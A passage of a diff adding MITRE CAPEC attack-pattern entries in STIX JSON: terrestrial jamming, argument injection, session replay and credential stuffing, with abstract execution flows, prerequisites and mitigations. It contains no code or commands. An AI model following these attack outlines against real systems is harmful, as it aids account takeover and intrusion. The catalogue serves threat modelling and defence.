This technique requires a terrestrial jammer that is more powerful than the frequencies sent from the satellite.", + "external_references": [ + { + "external_id": "CAPEC-599", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/599.html" + }, + { + "description": "Small Media, Satellite Jamming in Iran: A War over Airwaves, 2012--11", + "external_id": "REF-462", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--521fbe1c-28d6-4ca0-bc8b-6e2dbc91332e", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Terrestrial Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8711eca6-b3ad-40b7-b7ac-08be37885119" + ], + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny, degrade, or disrupt availability of satellite communications for the target by overwhelming its resources to accurately receive authorized transmissions.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "An attempt to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These jamming signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_resources_required": [ + "\n A terrestrial satellite jammer with a signal more powerful than that of the satellite attempting to communicate with the target.\n The adversary must know the location of the target satellite dish.\n " + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.", + "external_references": [ + { + "external_id": "CAPEC-6", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-146", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/146.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-185", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Jouko Pynnonen, Java Web Start argument injection vulnerability", + "external_id": "REF-482", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/archive/1/393696" + } + ], + "id": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Argument Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A recent example instance of argument injection occurred against Java Web Start technology, which eases the client side deployment for Java programs. The JNLP files that are used to describe the properties for the program. The client side Java runtime used the arguments in the property setting to define execution parameters, but if the attacker appends commands to an otherwise legitimate property file, then these commands are sent to the client command shell. [REF-482]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Discovery of potential injection vectors: Using an automated tool or manual discovery, the attacker identifies services or methods with arguments that could potentially be used as injection vectors (OS, API, SQL procedures, etc.).

  2. Techniques
    Manually cover the application and record the possible places where arguments could be passed into external systems.
    Use a spider, for web applications, to create a list of URLs and associated inputs.

Experiment

  1. 1. Attempt variations on argument content: Possibly using an automated tool, the attacker will perform injection variations of the arguments.

  2. Techniques
    Use a very large list of probe strings in order to detect if there is a positive result, and, what type of system has been targeted (if obscure).
    Use a proxy tool to record results, error messages and/or log if accessible.

Exploit

  1. Abuse of the application: The attacker injects specific syntax into a particular argument in order to generate a specific malicious effect in the targeted application.

  2. Techniques
    Manually inject specific payload into targeted argument.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software fails to strip all user-supplied input of any content that could cause the shell to perform unexpected actions.", + "Software must allow for unvalidated or unfiltered input to be executed on operating system shell, and, optionally, the system configuration must allow for output to be sent back to client." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Medium": "The attacker has to identify injection vector, identify the operating system-specific commands, and optionally collect the output." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. 
Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.", + "id": "course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--196a8c07-3041-48df-97b8-d20a2bf800b7", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899", + "spec_version": "2.1", + "target_ref": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Limit program privileges, so if metacharacters or other methods circumvent program input validation routines and shell access is attained then it is not running under a privileged account. 
chroot jails create a sandbox for the application to execute in, making it more difficult for an attacker to elevate privilege even in the case that a compromise has occurred.", + "id": "course-of-action--320708f6-d5a8-4781-bcef-5d707ceeb0f0", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c3192605-c8b0-48c6-a253-ced90d7fe3e0", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--320708f6-d5a8-4781-bcef-5d707ceeb0f0", + "spec_version": "2.1", + "target_ref": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement an audit log that is written to a separate host, in the event of a compromise the audit log may be able to provide evidence and details of the compromise.", + "id": "course-of-action--9c1506e3-58e3-4856-866d-9ec6c8a8a9ad", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba5cb3e3-2de4-49cd-a6c0-587480f23acd", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + 
], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c1506e3-58e3-4856-866d-9ec6c8a8a9ad", + "spec_version": "2.1", + "target_ref": "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.", + "external_references": [ + { + "external_id": "CAPEC-60", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/60.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-488", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/488.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Access Token Manipulation:Token Impersonation/Theft", + "external_id": "T1134.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134/001" + }, + { + "description": "Use Alternate Authentication Material:Web Session Cookie", + "external_id": "T1550.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/004" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Reusing Session IDs (aka Session Replay)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "OpenSSL and SSLeay allow remote attackers to reuse SSL sessions and bypass access controls. See also: CVE-1999-0428", + "Merak Mail IceWarp Web Mail uses a static identifier as a user session ID that does not change across sessions, which could allow remote attackers with access to the ID to gain privileges as that user, e.g. by extracting the ID from the user's answer or forward URLs. See also: CVE-2002-0258" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The attacker interacts with the target host and finds that session IDs are used to authenticate users.

  2. The attacker steals a session ID from a valid user.

Exploit

  1. The attacker tries to use the stolen session ID to gain access to the system with the privileges of the session ID's original owner.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host uses session IDs to keep track of the users.", + "Session IDs are used to control access to resources.", + "The session IDs used by the target host are not well protected from session theft." + ], + "x_capec_skills_required": { + "Low": "If an attacker can steal a valid session ID, they can then try to be authenticated with that stolen session ID.", + "Medium": "More sophisticated attack can be used to hijack a valid session from a user and spoof a legitimate user by reusing their valid session ID." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Always invalidate a session ID after the user logout.", + "id": "course-of-action--e132b1ab-8471-4391-8be7-58657c09f46c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--908e8d74-13d5-49a7-ac4c-99df0daf47f0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e132b1ab-8471-4391-8be7-58657c09f46c", + "spec_version": "2.1", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Setup a session time out for the session IDs.", + "id": 
"course-of-action--887085f5-8775-46fa-bca9-fa2fa8d395a3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f28d834-ffd7-4c6d-ad68-e70a69745dc9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--887085f5-8775-46fa-bca9-fa2fa8d395a3", + "spec_version": "2.1", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect the communication between the client and server. 
For instance it is best practice to use SSL to mitigate adversary in the middle attacks (CAPEC-94).", + "id": "course-of-action--4f370dea-3940-4d61-bccc-2945efaee2fc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb55e2e4-e6f7-45ee-9ae9-fd7631b85a05", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f370dea-3940-4d61-bccc-2945efaee2fc", + "spec_version": "2.1", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not code send session ID with GET method, otherwise the session ID will be copied to the URL. In general avoid writing session IDs in the URLs. 
URLs can get logged in log files, which are vulnerable to an attacker.", + "id": "course-of-action--c2568b87-4ece-4f22-a1c1-5305dd455ab4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--71ab000c-de21-4717-95f9-4aae387d2d7c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c2568b87-4ece-4f22-a1c1-5305dd455ab4", + "spec_version": "2.1", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt the session data associated with the session ID.", + "id": "course-of-action--bfd1036e-01fb-4b7d-a112-830c3c3a4b0e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5dc170d-4034-4559-acd3-ad3cfff69416", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bfd1036e-01fb-4b7d-a112-830c3c3a4b0e", + "spec_version": "2.1", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use multifactor authentication.", + "id": "course-of-action--f8aa308d-e6bc-4de3-86be-da1213ff1371", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-60-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f886c45-625d-4dd6-9659-8b92fdb432e3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8aa308d-e6bc-4de3-86be-da1213ff1371", + "spec_version": "2.1", + "target_ref": "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. 
Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.\n ", + "external_references": [ + { + "external_id": "CAPEC-600", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/600.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Brute Force:Credential Stuffing", + "external_id": "T1110.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/004" + }, + { + "description": "Credential stuffing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-567", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + }, + { + "description": "Credential stuffing, Open Web Application Security Project (OWASP)", + "external_id": "REF-568", + "source_name": "reference_from_CAPEC", + "url": 
"https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Jessica Silver-Greenberg, Matthew Goldstein, Nicole Perlroth, JPMorgan Chase Hacking Affects 76 Million Households, 2014--10---02, The New York Times", + "external_id": "REF-569", + "source_name": "reference_from_CAPEC", + "url": "https://dealbook.nytimes.com/2014/10/02/jpmorgan-discovers-further-cyber-security-issues/" + } + ], + "id": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Credential Stuffing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user leverages the password \"Password123\" for a handful of application logins. 
An adversary obtains a victim's username/password combination from a breach of a social media application and executes a Credential Stuffing attack against multiple banking and credit card applications. Since the user leverages the same credentials for their bank account login, the adversary successfully authenticates to the user's bank account and transfer money to an offshore account.", + "In October 2014 J.P. Morgan's Corporate Challenge website was breached, resulting in adversaries obtaining multiple username/password pairs. A Credential Stuffing attack was then executed against J.P. Morgan Chase, which resulted in over 76 million households having their accounts compromised." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known credentials: The adversary must obtain known credentials in order to access the target system, application, or service.

  2. Techniques
    An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal credentials as they are transmitted.
    An adversary gains access to a database and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.
  3. Determine target's password policy: Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.

  4. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).

Experiment

  1. Attempt authentication: Try each username/password combination until the target grants access.

  2. Techniques
    Manually or automatically enter each username/password combination through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks of this kind often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications.\n The primary goal of Credential Stuffing is to achieve lateral movement and gain authenticated access to additional systems, applications, and/or services. A successfully executed Credential Stuffing attack could result in the adversary impersonating the victim or executing any action that the victim is authorized to perform.\n Although not technically a brute force attack, Credential Stuffing attacks can function as such if an adversary possess multiple known passwords for the same user account. This may occur in the event where an adversary obtains user credentials from multiple sources or if the adversary obtains a user's password history for an account.\n Credential Stuffing attacks are similar to Password Spraying attacks (CAPEC-565) regarding their targets and their overall goals. However, Password Spraying attacks do not have any insight into known username/password combinations and instead leverage common or expected passwords. This also means that Password Spraying attacks must avoid inducing account lockouts, which is generally not a worry of Credential Stuffing attacks. 
Password Spraying attacks may additionally lead to Credential Stuffing attacks, once a successful username/password combination is discovered.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD).", + "A known list of username/password combinations.", + "A custom script that leverages the credential list to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A Credential Stuffing attack is very straightforward." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c4ceb80d-d66e-40ed-8041-badec381e5b7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5041416c-f169-4ccd-a849-d3df74a189c9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": 
"mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--31e79d3e-c3fa-47e2-9e66-4fec40ce3d44", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--46e1f0c5-b178-4459-96f1-6522f4e3e9ab", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "spec_version": "2.1", + "target_ref": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5bcb0cc-37a1-46f8-8b46-cd63f87de636", + "modified": 